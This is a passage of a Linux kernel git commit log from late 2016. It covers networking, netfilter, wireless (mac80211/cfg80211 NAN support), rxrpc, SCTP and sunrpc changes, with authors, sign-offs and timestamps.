headers to be set when a MPLS packet just enters the bridge or after it is
recirculated.

Fixes: 48d2ab609b ("net: mpls: Fixups for GSO")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:00:21 -04:00
Arnd Bergmann
fa34cd94fb net: rtnl: avoid uninitialized data in IFLA_VF_VLAN_LIST handling
With the newly added support for IFLA_VF_VLAN_LIST netlink messages,
we get a warning about potential uninitialized variable use in
the parsing of the user input when enabling the -Wmaybe-uninitialized
warning:

net/core/rtnetlink.c: In function 'do_setvfinfo':
net/core/rtnetlink.c:1756:9: error: 'ivvl$' may be used uninitialized in this function [-Werror=maybe-uninitialized]

I have not been able to prove whether it is possible to arrive in
this code with an empty IFLA_VF_VLAN_LIST block, but if we do,
then ndo_set_vf_vlan gets called with uninitialized arguments.

This adds an explicit check for an empty list, making it obvious
to the reader and the compiler that this cannot happen.

Fixes: 79aab093a0 ("net: Update API for VF vlan protocol 802.1ad support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Reviewed-by: Moshe Shemesh <moshe@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 01:31:48 -04:00
Paolo Abeni
63d75463c9 net: pktgen: fix pkt_size
The commit 879c7220e8 ("net: pktgen: Observe needed_headroom
of the device") increased the 'pkt_overhead' field value by
LL_RESERVED_SPACE.
As a side effect the generated packet size, computed as:

	/* Eth + IPh + UDPh + mpls */
	datalen = pkt_dev->cur_pkt_size - 14 - 20 - 8 -
		  pkt_dev->pkt_overhead;

is decreased by the same value.
The above changed slightly the behavior of existing pktgen users,
and made the procfs interface somewhat inconsistent.
Fix it by restoring the previous pkt_overhead value and using
LL_RESERVED_SPACE as extralen in skb allocation.
Also, change pktgen_alloc_skb() to only partially reserve
the headroom to allow the caller to prefetch from ll header
start.

v1 -> v2:
 - fixed some typos in the comments

Fixes: 879c7220e8 ("net: pktgen: Observe needed_headroom of the device")
Suggested-by: Ben Greear <greearb@candelatech.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 01:29:57 -04:00
Maciej Żenczykowski
cb9e684e89 ipv6 addrconf: remove addrconf_sysctl_hop_limit()
This is an effective no-op in terms of user observable behaviour.

By preventing the overwrite of non-null extra1/extra2 fields
in addrconf_sysctl() we can enable the use of proc_dointvec_minmax().

This allows us to eliminate the constant min/max (1..255) trampoline
function that is addrconf_sysctl_hop_limit().

This is nice because it simplifies the code, and allows future
sysctls with constant min/max limits to also not require trampolines.

We still can't eliminate the trampoline for mtu because it isn't
actually a constant (it depends on other tunables of the device)
and thus requires at-write-time logic to enforce range.

Signed-off-by: Maciej Żenczykowski <maze@google.com>
Acked-by: Erik Kline <ek@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-02 23:48:13 -04:00
Stefan Agner
d4ef9f7212 netfilter: bridge: clarify bridge/netfilter message
When using bridge without bridge netfilter enabled the message
displayed is rather confusing and leads to belive that a deprecated
feature is in use. Use IS_MODULE to be explicit that the message only
affects users which use bridge netfilter as module and reword the
message.

Signed-off-by: Stefan Agner <stefan@agner.ch>
Acked-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-02 22:44:03 -04:00
David S. Miller
b50afd203a Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Three sets of overlapping changes.  Nothing serious.

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-02 22:20:41 -04:00
Tyler Hicks
d6169b0206 net: Use ns_capable_noaudit() when determining net sysctl permissions
The capability check should not be audited since it is only being used
to determine the inode permissions. A failed check does not indicate a
violation of security policy but, when an LSM is enabled, a denial audit
message was being generated.

The denial audit message caused confusion for some application authors
because root-running Go applications always triggered the denial. To
prevent this confusion, the capability check in net_ctl_permissions() is
switched to the noaudit variant.

BugLink: https://launchpad.net/bugs/1465724

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Serge E. Hallyn <serge.hallyn@ubuntu.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
[dtor: reapplied after e79c6a4fc9 ("net: make net namespace sysctls
belong to container's owner") accidentally reverted the change.]
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-01 03:24:28 -04:00
Frank Sorenson
66cbd4ba8a sunrpc: replace generic auth_cred hash with auth-specific function
Replace the generic code to hash the auth_cred with the call to
the auth-specific hash function in the rpc_authops struct.

Signed-off-by: Frank Sorenson <sorenson@redhat.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-30 15:47:47 -04:00
Frank Sorenson
a960f8d6db sunrpc: add RPCSEC_GSS hash_cred() function
Add a hash_cred() function for RPCSEC_GSS, using only the
uid from the auth_cred.

Signed-off-by: Frank Sorenson <sorenson@redhat.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-30 15:47:13 -04:00
Frank Sorenson
1e035d065f sunrpc: add auth_unix hash_cred() function
Add a hash_cred() function for auth_unix, using both the
uid and gid from the auth_cred.

Signed-off-by: Frank Sorenson <sorenson@redhat.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-30 15:45:21 -04:00
Frank Sorenson
18028c967e sunrpc: add generic_auth hash_cred() function
Add a hash_cred() function for generic_auth, using both the
uid and gid from the auth_cred.

Signed-off-by: Frank Sorenson <sorenson@redhat.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-30 15:33:36 -04:00
Vishwanath Pai
1f827f5138 netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division
Division of 64bit integers will cause linker error undefined reference
to `__udivdi3'. Fix this by replacing divisions with div64_64

Fixes: 11d5f15723 ("netfilter: xt_hashlimit: Create revision 2 to ...")
Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30 20:15:27 +02:00
Aaron Conole
7816ec564e netfilter: accommodate different kconfig in nf_set_hooks_head
When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
the request for registration properly by dropping the hook.  This
releases the entry during the set.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30 20:15:26 +02:00
Aaron Conole
5119e4381a netfilter: Fix potential null pointer dereference
It's possible for nf_hook_entry_head to return NULL.  If two
nf_unregister_net_hook calls happen simultaneously with a single hook
entry in the list, both will enter the nf_hook_mutex critical section.
The first will successfully delete the head, but the second will see
this NULL pointer and attempt to dereference.

This fix ensures that no null pointer dereference could occur when such
a condition happens.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30 20:15:26 +02:00
David Howells
405dea1deb rxrpc: Fix the call timer handling
The call timer's concept of a call timeout (of which there are three) that
is inactive is that it is the timeout has the same expiration time as the
call expiration timeout (the expiration timer is never inactive).  However,
I'm not resetting the timeouts when they expire, leading to repeated
processing of expired timeouts when other timeout events occur.

Fix this by:

 (1) Move the timer expiry detection into rxrpc_set_timer() inside the
     locked section.  This means that if a timeout is set that will expire
     immediately, we deal with it immediately.

 (2) If a timeout is at or before now then it has expired.  When an expiry
     is detected, an event is raised, the timeout is automatically
     inactivated and the event processor is queued.

 (3) If a timeout is at or after the expiry timeout then it is inactive.
     Inactive timeouts do not contribute to the timer setting.

 (4) The call timer callback can now just call rxrpc_set_timer() to handle
     things.

 (5) The call processor work function now checks the event flags rather
     than checking the timeouts directly.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:40:11 +01:00
David Howells
df0adc788a rxrpc: Keep the call timeouts as ktimes rather than jiffies
Keep that call timeouts as ktimes rather than jiffies so that they can be
expressed as functions of RTT.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:40:11 +01:00
David Howells
c31410ea00 rxrpc: Remove error from struct rxrpc_skb_priv as it is unused
Remove error from struct rxrpc_skb_priv as it is no longer used.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:39:32 +01:00
David Howells
775e5b71db rxrpc: The offset field in struct rxrpc_skb_priv is unnecessary
The offset field in struct rxrpc_skb_priv is unnecessary as the value can
always be calculated.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:39:28 +01:00
David Howells
0851115090 rxrpc: Reduce ssthresh to peer's receive window
When we receive an ACK from the peer that tells us what the peer's receive
window (rwind) is, we should reduce ssthresh to rwind if rwind is smaller
than ssthresh.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:38:59 +01:00
David Howells
8782def204 rxrpc: Switch to Congestion Avoidance mode at cwnd==ssthresh
Switch to Congestion Avoidance mode at cwnd == ssthresh rather than relying
on cwnd getting incremented beyond ssthresh and the window size, the mode
being shifted and then cwnd being corrected.

We need to make sure we switch into CA mode so that we stop marking every
packet for ACK.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:38:56 +01:00
Toke Høiland-Jørgensen
bb42f2d13f mac80211: Move reorder-sensitive TX handlers to after TXQ dequeue
The TXQ intermediate queues can cause packet reordering when more than
one flow is active to a single station. Since some of the wifi-specific
packet handling (notably sequence number and encryption handling) is
sensitive to re-ordering, things break if they are applied before the
TXQ.

This splits up the TX handlers and fast_xmit logic into two parts: An
early part and a late part. The former is applied before TXQ enqueue,
and the latter after dequeue. The non-TXQ path just applies both parts
at once.

Because fragments shouldn't be split up or reordered, the fragmentation
handler is run after dequeue. Any fragments are then kept in the TXQ and
on subsequent dequeues they take precedence over dequeueing from the FQ
structure.

This approach avoids having to scatter special cases all over the place
for when TXQ is enabled, at the cost of making the fast_xmit and TX
handler code slightly more complex.

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
[fix a few code-style nits, make ieee80211_xmit_fast_finish void,
 remove a useless txq->sta check]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 14:46:57 +02:00
Pedersen, Thomas
3a53731df7 mac80211: mesh: decrease max drift
The old value was 30ms, which means mesh sync will treat
any value below as merely TSF drift. This isn't really
reasonable (typical drift is < 10us/s) since people
probably want to adjust TSF in smaller increments (for ie.
beacon collision avoidance) without mesh sync fighting
back.

Change max drift adjustment to 0.8ms, so manual TSF
adjustments can be made in 1ms increments, with some
margin.

Signed-off-by: Thomas Pedersen <twp@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:47:00 +02:00
Pedersen, Thomas
354d381baf mac80211: add offset_tsf driver op and use it for mesh
This allows the mesh sync (and debugfs) code to make incremental
TSF adjustments, avoiding any uncertainty introduced by delay in
programming absolute TSF.

Signed-off-by: Thomas Pedersen <twp@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:45:44 +02:00
Toke Høiland-Jørgensen
3ff23cd565 mac80211: Set lower memory limit for non-VHT devices
Small devices can run out of memory from queueing too many packets. If
VHT is not supported by the PHY, having more than 4 MBytes of total
queue in the TXQ intermediate queues is not needed, and so we can safely
limit the memory usage in these cases and avoid OOM.

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:33:33 +02:00
Toke Høiland-Jørgensen
2a4e675d88 mac80211: Export fq memory limit information in debugfs
Add memory limit, usage and overlimit counter to per-PHY 'aqm' debugfs
file.

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:29:31 +02:00
Ayala Beker
92bc43bce2 mac80211: Add API to report NAN function match
Provide an API to report NAN function match. Mac80211 will lookup the
corresponding cookie and report the match to cfg80211.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:57 +02:00
Ayala Beker
167e33f4f6 mac80211: Implement add_nan_func and rm_nan_func
Implement add/rm_nan_func functions and handle NAN function
termination notifications. Handle instance_id allocation for
NAN functions and implement the reconfig flow.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:52 +02:00
Ayala Beker
5953ff6d6a mac80211: implement nan_change_conf
Implement nan_change_conf callback which allows to change current
NAN configuration (master preference and dual band operation).
Store the current NAN configuration in sdata, so it can be used
both to provide the driver the updated configuration with changes
and also it will be used in hw reconfig flows in next patches.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:43 +02:00
Ayala Beker
368e5a7b4e cfg80211: Provide an API to report NAN function termination
Provide a function that reports NAN DE function termination. The function
may be terminated due to one of the following reasons: user request,
ttl expiration or failure.
If the NAN instance is tied to the owner, the notification will be
sent to the socket that started the NAN interface only

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:37 +02:00
Ayala Beker
50bcd31d99 cfg80211: provide a function to report a match for NAN
Provide a function the driver can call to report a match.
This will send the event to the user space.
If the NAN instance is tied to the owner, the notifications will be
sent to the socket that started the NAN interface only.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:32 +02:00
Ayala Beker
a5a9dcf291 cfg80211: allow the user space to change current NAN configuration
Some NAN configuration paramaters may change during the operation of
the NAN device. For example, a user may want to update master preference
value when the device gets plugged/unplugged to the power.
Add API that allows to do so.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:28 +02:00
Ayala Beker
a442b761b2 cfg80211: add add_nan_func / del_nan_func
A NAN function can be either publish, subscribe or follow
up. Make all the necessary verifications and just pass the
request to the driver.
Allow the user space application that starts NAN to
forbid any other socket to add or remove functions.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Ayala Beker <ayala.beker@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:23 +02:00
Ayala Beker
708d50edb1 mac80211: add boilerplate code for start / stop NAN
This code doesn't do much besides allowing to start and
stop the vif.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Ayala Beker <ayala.beker@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:19 +02:00
Ayala Beker
cb3b7d8765 cfg80211: add start / stop NAN commands
This allows user space to start/stop NAN interface.
A NAN interface is like P2P device in a few aspects: it
doesn't have a netdev associated to it.
Add the new interface type and prevent operations that
can't be executed on NAN interface like scan.

Define several attributes that may be configured by user space
when starting NAN functionality (master preference and dual
band operation)

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:14 +02:00
David Spinadel
b8676221f0 cfg80211: Add support for static WEP in the driver
Add support for drivers that implement static WEP internally, i.e.
expose connection keys to the driver in connect flow and don't
upload the keys after the connection.

Signed-off-by: David Spinadel <david.spinadel@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:19:10 +02:00
Toke Høiland-Jørgensen
e0e2effff5 mac80211: Move ieee802111_tx_dequeue() to later in tx.c
The TXQ path restructure requires ieee80211_tx_dequeue() to call TX
handlers and parts of the xmit_fast path. Move the function to later in
tx.c in preparation for this.

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:12:48 +02:00
Florian Westphal
2258d927a6 xfrm: remove unused helper
Not used anymore since 2009 (9e0d57fd6d,
'xfrm: SAD entries do not expire correctly after suspend-resume').

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
2016-09-30 08:20:56 +02:00
Xin Long
1cceda7849 sctp: fix the issue sctp_diag uses lock_sock in rcu_read_lock
When sctp dumps all the ep->assocs, it needs to lock_sock first,
but now it locks sock in rcu_read_lock, and lock_sock may sleep,
which would break rcu_read_lock.

This patch is to get and hold one sock when traversing the list.
After that and get out of rcu_read_lock, lock and dump it. Then
it will traverse the list again to get the next one until all
sctp socks are dumped.

For sctp_diag_dump_one, it fixes this issue by holding asoc and
moving cb() out of rcu_read_lock in sctp_transport_lookup_process.

Fixes: 8f840e47f1 ("sctp: add the sctp_diag.c file")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 02:08:57 -04:00
Xin Long
be4947bf46 sctp: change to check peer prsctp_capable when using prsctp polices
Now before using prsctp polices, sctp uses asoc->prsctp_enable to
check if prsctp is enabled. However asoc->prsctp_enable is set only
means local host support prsctp, sctp should not abandon packet if
peer host doesn't enable prsctp.

So this patch is to use asoc->peer.prsctp_capable to check if prsctp
is enabled on both side, instead of asoc->prsctp_enable, as asoc's
peer.prsctp_capable is set only when local and peer both enable prsctp.

Fixes: a6c2f79287 ("sctp: implement prsctp TTL policy")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 02:07:05 -04:00
Xin Long
0605483f6a sctp: remove prsctp_param from sctp_chunk
Now sctp uses chunk->prsctp_param to save the prsctp param for all the
prsctp polices, we didn't need to introduce prsctp_param to sctp_chunk.
We can just use chunk->sinfo.sinfo_timetolive for RTX and BUF polices,
and reuse msg->expires_at for TTL policy, as the prsctp polices and old
expires policy are mutual exclusive.

This patch is to remove prsctp_param from sctp_chunk, and reuse msg's
expires_at for TTL and chunk's sinfo.sinfo_timetolive for RTX and BUF
polices.

Note that sctp can't use chunk's sinfo.sinfo_timetolive for TTL policy,
as it needs a u64 variables to save the expires_at time.

This one also fixes the "netperf-Throughput_Mbps -37.2% regression"
issue.

Fixes: a6c2f79287 ("sctp: implement prsctp TTL policy")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 02:07:05 -04:00
Maciej Żenczykowski
bd11f0741f ipv6 addrconf: implement RFC7559 router solicitation backoff
This implements:
  https://tools.ietf.org/html/rfc7559

Backoff is performed according to RFC3315 section 14:
  https://tools.ietf.org/html/rfc3315#section-14

We allow setting /proc/sys/net/ipv6/conf/*/router_solicitations
to a negative value meaning an unlimited number of retransmits,
and we make this the new default (inline with the RFC).

We also add a new setting:
  /proc/sys/net/ipv6/conf/*/router_solicitation_max_interval
defaulting to 1 hour (per RFC recommendation).

Signed-off-by: Maciej Żenczykowski <maze@google.com>
Acked-by: Erik Kline <ek@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:54:28 -04:00
Jia He
6d4a741cbb net: Suppress the "Comparison to NULL could be written" warnings
This is to suppress the checkpatch.pl warning "Comparison to NULL
could be written". No functional changes here.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:45 -04:00
Jia He
aca05671d5 ipv6: Remove useless parameter in __snmp6_fill_statsdev
The parameter items(is always ICMP6_MIB_MAX) is useless for __snmp6_fill_statsdev

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:45 -04:00
Jia He
07613873f1 proc: Reduce cache miss in xfrm_statistics_seq_show
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to
aggregate the data by going through all the items of each cpu sequentially.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:45 -04:00
Jia He
7d64a94be2 proc: Reduce cache miss in sctp_snmp_seq_show
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to
aggregate the data by going through all the items of each cpu sequentially.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:44 -04:00
Jia He
4a4857b1c8 proc: Reduce cache miss in snmp6_seq_show
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to
aggregate the data by going through all the items of each cpu sequentially.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:44 -04:00
Jia He
f22d5c4909 proc: Reduce cache miss in snmp_seq_show
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to
aggregate the data by going through all the items of each cpu sequentially.
Then snmp_seq_show is split into 2 parts to avoid build warning "the frame
size" larger than 1024.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:44 -04:00
David Howells
ed1e8679d8 rxrpc: Note serial number being ACK'd in the congestion management trace
Note the serial number of the packet being ACK'd in the congestion
management trace rather than the serial number of the ACK packet.  Whilst
the serial number of the ACK packet is useful for matching ACK packet in
the output of wireshark, the serial number that the ACK is in response to
is of more use in working out how different trace lines relate.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:57:47 +01:00
David Howells
b112a67081 rxrpc: Request more ACKs in slow-start mode
Set the request-ACK on more DATA packets whilst we're in slow start mode so
that we get sufficient ACKs back to supply information to configure the
window.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:57:47 +01:00
David Howells
1e9e5c9521 rxrpc: Reduce the rxrpc_local::services list to a pointer
Reduce the rxrpc_local::services list to just a pointer as we don't permit
multiple service endpoints to bind to a single transport endpoints (this is
excluded by rxrpc_lookup_local()).

The reason we don't allow this is that if you send a request to an AFS
filesystem service, it will try to talk back to your cache manager on the
port you sent from (this is how file change notifications are handled).  To
prevent someone from stealing your CM callbacks, we don't let AF_RXRPC
sockets share a UDP socket if at least one of them has a service bound.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:57:47 +01:00
David Howells
2629c7fa7c rxrpc: When activating client conn channels, do state check inside lock
In rxrpc_activate_channels(), the connection cache state is checked outside
of the lock, which means it can change whilst we're waking calls up,
thereby changing whether or not we're allowed to wake calls up.

Fix this by moving the check inside the locked region.  The check to see if
all the channels are currently busy can stay outside of the locked region.

Whilst we're at it:

 (1) Split the locked section out into its own function so that we can call
     it from other places in a later patch.

 (2) Determine the mask of channels dependent on the state as we're going
     to add another state in a later patch that will restrict the number of
     simultaneous calls to 1 on a connection.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:57:47 +01:00
David Howells
a1767077b0 rxrpc: Make Tx loss-injection go through normal return and adjust tracing
In rxrpc_send_data_packet() make the loss-injection path return through the
same code as the transmission path so that the RTT determination is
initiated and any future timer shuffling will be done, despite the packet
having been binned.

Whilst we're at it:

 (1) Add to the tx_data tracepoint an indication of whether or not we're
     retransmitting a data packet.

 (2) When we're deciding whether or not to request an ACK, rather than
     checking if we're in fast-retransmit mode check instead if we're
     retransmitting.

 (3) Don't invoke the lose_skb tracepoint when losing a Tx packet as we're
     not altering the sk_buff refcount nor are we just seeing it after
     getting it off the Tx list.

 (4) The rxrpc_skb_tx_lost note is then no longer used so remove it.

 (5) rxrpc_lose_skb() no longer needs to deal with rxrpc_skb_tx_lost.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:37:15 +01:00
David Howells
8732db67c6 rxrpc: Fix exclusive client connections
Exclusive connections are currently reusable (which they shouldn't be)
because rxrpc_alloc_client_connection() checks the exclusive flag in the
rxrpc_connection struct before it's initialised from the function
parameters.  This means that the DONT_REUSE flag doesn't get set.

Fix this by checking the function parameters for the exclusive flag.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:37:15 +01:00
Eric Dumazet
7836667cec net: do not export sk_stream_write_space
Since commit 900f65d361 ("tcp: move duplicate code from
tcp_v4_init_sock()/tcp_v6_init_sock()") we no longer need
to export sk_stream_write_space()

From: Eric Dumazet <edumazet@google.com>
Cc: Neal Cardwell <ncardwell@google.com>

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 20:32:38 -04:00
Johannes Berg
8f7d99ba85 cfg80211: wext: really don't store non-WEP keys
Jouni reported that during (repeated) wext_pmf test runs (from the
wpa_supplicant hwsim test suite) the kernel crashes. The reason is
that after the key is set, the wext code still unnecessarily stores
it into the key cache. Despite smatch pointing out an overflow, I
failed to identify the possibility for this in the code and missed
it during development of the earlier patch series.

In order to fix this, simply check that we never store anything but
WEP keys into the cache, adding a comment as to why that's enough.

Also, since the cache is still allocated early even if it won't be
used in many cases, add a comment explaining why - otherwise we'd
have to roll back key settings to the driver in case of allocation
failures, which is far more difficult.

Fixes: 89b706fb28 ("cfg80211: reduce connect key caching struct size")
Reported-by: Jouni Malinen <j@w1.fi>
Bisected-by: Jouni Malinen <j@w1.fi>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-28 23:55:23 +02:00
Lawrence Brakmo
3acf3ec3f4 tcp: Change txhash on every SYN and RTO retransmit
The current code changes txhash (flowlables) on every retransmitted
SYN/ACK, but only after the 2nd retransmitted SYN and only after
tcp_retries1 RTO retransmits.

With this patch:
1) txhash is changed with every SYN retransmits
2) txhash is changed with every RTO.

The result is that we can start re-routing around failed (or very
congested paths) as soon as possible. Otherwise application health
checks may fail and the connection may be terminated before we start
to change txhash.

v4: Removed sysctl, txhash is changed for all RTOs
v3: Removed text saying default value of sysctl is 0 (it is 100)
v2: Added sysctl documentation and cleaned code

Tested with packetdrill tests

Signed-off-by: Lawrence Brakmo <brakmo@fb.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 07:52:34 -04:00
Jiri Pirko
347e3b28c1 switchdev: remove FIB offload infrastructure
Since this is now taken care of by FIB notifier, remove the code, with
all unused dependencies.

Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 04:48:00 -04:00
Jiri Pirko
c98501879b fib: introduce FIB info offload flag helpers
These helpers are to be used in case someone offloads the FIB entry. The
result is that if the entry is offloaded to at least one device, the
offload flag is set.

Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Reviewed-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 04:48:00 -04:00
Jiri Pirko
b90eb75494 fib: introduce FIB notification infrastructure
This allows to pass information about added/deleted FIB entries/rules to
whoever is interested. This is done in a very similar way as devinet
notifies address additions/removals.

Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 04:48:00 -04:00
Hadar Hen Zion
eb523f42d7 net/sched: cls_flower: Use a proper mask value for enc key id parameter
The current code use the encapsulation key id value as the mask of that
parameter which is wrong. Fix that by using a full mask.

Fixes: bc3103f1ed ('net/sched: cls_flower: Classify packet in ip tunnels')
Signed-off-by: Hadar Hen Zion <hadarh@mellanox.com>
Acked-by: Amir Vadai <amir@vadai.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 03:11:22 -04:00
Deepa Dinamani
078cd8279e fs: Replace CURRENT_TIME with current_time() for inode timestamps
CURRENT_TIME macro is not appropriate for filesystems as it
doesn't use the right granularity for filesystem timestamps.
Use current_time() instead.

CURRENT_TIME is also not y2038 safe.

This is also in preparation for the patch that transitions
vfs timestamps to use 64 bit time and hence make them
y2038 safe. As part of the effort current_time() will be
extended to do range checks. Hence, it is necessary for all
file system timestamps to use current_time(). Also,
current_time() will be transitioned along with vfs to be
y2038 safe.

Note that whenever a single call to current_time() is used
to change timestamps in different inodes, it is because they
share the same time granularity.

Signed-off-by: Deepa Dinamani <deepa.kernel@gmail.com>
Reviewed-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Felipe Balbi <balbi@kernel.org>
Acked-by: Steven Whitehouse <swhiteho@redhat.com>
Acked-by: Ryusuke Konishi <konishi.ryusuke@lab.ntt.co.jp>
Acked-by: David Sterba <dsterba@suse.com>
